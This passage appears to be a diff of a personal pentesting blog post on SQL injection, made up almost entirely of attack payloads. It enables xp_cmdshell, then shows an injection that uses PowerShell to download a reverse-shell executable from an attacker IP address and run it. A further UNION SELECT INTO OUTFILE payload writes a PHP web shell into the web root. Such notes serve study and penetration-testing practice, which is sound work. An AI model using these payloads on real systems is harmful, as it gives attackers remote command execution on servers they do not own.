ST4RGUARD/ST4RGUARD.github.io/_posts/2023-09-01-sql_injection.md

     $ RECONFIGURE;
     $ EXECUTE xp_cmdshell 'whoami';

+we can leverage a blind sql injection with xp_cmdshell enabled to download a reverse shell with ps

+    admin' EXEC xp_cmdshell "powershell iex(iwr http://192.168.45.215:8000/rs443.exe -Outfile C:\Users\Public\rs443.exe)" --

+the shell needs to be downloaded to a dir with exec privs

+then we can execute

+    admin' EXEC xp_cmdshell "(C:\Users\Public\rs443.exe)" --

 we can write files on the server with SELECT INTO_OUTFILE

     $ ' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null, null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //